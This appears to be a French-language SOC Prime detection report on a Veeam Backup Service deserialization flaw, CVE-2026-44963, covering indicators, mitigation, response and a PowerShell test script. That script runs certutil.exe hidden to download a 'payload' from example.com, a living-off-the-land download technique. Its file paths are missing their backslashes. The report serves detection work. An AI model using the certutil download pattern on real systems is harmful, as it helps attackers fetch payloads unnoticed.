SOC Prime Bias: Critique

10 Jul 2026 18:16 UTC

CVE-2026-44963 : Indicateurs d’exploitation du service de sauvegarde Veeam

Author Photo
SOC Prime Team linkedin icon Suivre
CVE-2026-44963 : Indicateurs d’exploitation du service de sauvegarde Veeam
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Ce rapport décrit les indicateurs de compromission associés à CVE-2026-44963, une vulnérabilité dans Veeam Backup Service pouvant permettre l’exécution de code à distance via une désérialisation non sécurisée. Les attaquants peuvent exploiter cette faille pour lancer des processus enfant suspects depuis le service Veeam. L’activité résultante peut conduire à un accès non autorisé et créer des opportunités de déplacement latéral à travers le réseau.

Enquête

L’enquête se concentre sur la détection de processus enfant suspects engendrés par Veeam.Backup.Service.exe, y compris des outils tels que cmd.exe or powershell.exe, et l’identification d’activités réseau inhabituelles sur les ports liés à Veeam. Les analystes doivent également surveiller les événements de connexion non autorisés et les modifications de fichiers inattendues dans les répertoires Veeam.

Atténuation

Pour réduire le risque, les administrateurs doivent mettre à jour Veeam Backup & Replication vers une version qui corrige la faille de désérialisation non sécurisée. Les politiques de pare-feu doivent strictement limiter l’accès aux ports Veeam 9392-9419, et les défenseurs doivent surveiller l’authentification à ces services par des utilisateurs de domaine non administratifs. Les comptes de service doivent également être restreints selon le principe du moindre privilège.

Réponse

Si une activité suspecte est détectée, le serveur Veeam affecté doit être isolé du réseau immédiatement. Les enquêteurs doivent examiner les journaux d’exécution des processus, y compris l’ID d’événement 4688 et la télémétrie Sysmon, ainsi que les enregistrements de connexion réseau pour déterminer l’étendue de la compromission. L’activité récente des comptes doit être auditée, et les identifiants doivent être réinitialisés pour tous les comptes impliqués pendant la fenêtre d’intrusion suspectée.

Flux d’Attaque

Exécution de simulation

Prérequis : Le contrôle de pré-vol de télémétrie & de base doit avoir été réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront une mauvaise interprétation.

  • Narrative d’attaque & Commandes : L’adversaire cible une vulnérabilité dans le Veeam Backup Service (simulée) pour obtenir des privilèges d’exécution. Pour garder un profil bas tout en téléchargeant une charge utile de deuxième étape, l’attaquant utilise le processus Veeam détourné pour lancer certutil.exe, un binaire commun de Living-off-the-Land, pour récupérer un fichier distant. Cette action vise à déclencher la création_de_processus logique de la règle de détection.

  • Script de test de régression :

    # DÉPART DE LA SIMULATION : Ce script simule le service Veeam engendrant un processus suspect.
    # Note : Étant donné que nous ne pouvons pas facilement « devenir » le service Veeam sans droits admin/system, 
    # nous simulerons la télémétrie en créant un processus factice qui imite le chemin ParentImage.
    
    $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe"
    $TargetBinary = "certutil.exe"
    
    Write-Host "[+] Simulation du processus enfant suspect depuis $VeeamPath" -ForegroundColor Cyan
    
    # Dans un environnement réel, la vulnérabilité ferait que le service appelle ceci.
    # Pour validation, nous déclenchons le processus. Pour correspondre strictement à l'exigence 'ParentImage' de la règle Sigma en laboratoire, 
    # le testeur devrait renommer manuellement un processus 
    # ou utiliser un outil pour simuler l'ID du Processus Parent (PPID) si l'on teste un EDR spécifique.
    
    Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden
    
    Write-Host "[+] Commande de simulation exécutée." -ForegroundColor Green
  • Commandes de nettoyage :

    # Supprimer tous les fichiers temporaires créés par la simulation
    Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue
    Stop-Process -Name "certutil" -ErrorAction SilentlyContinue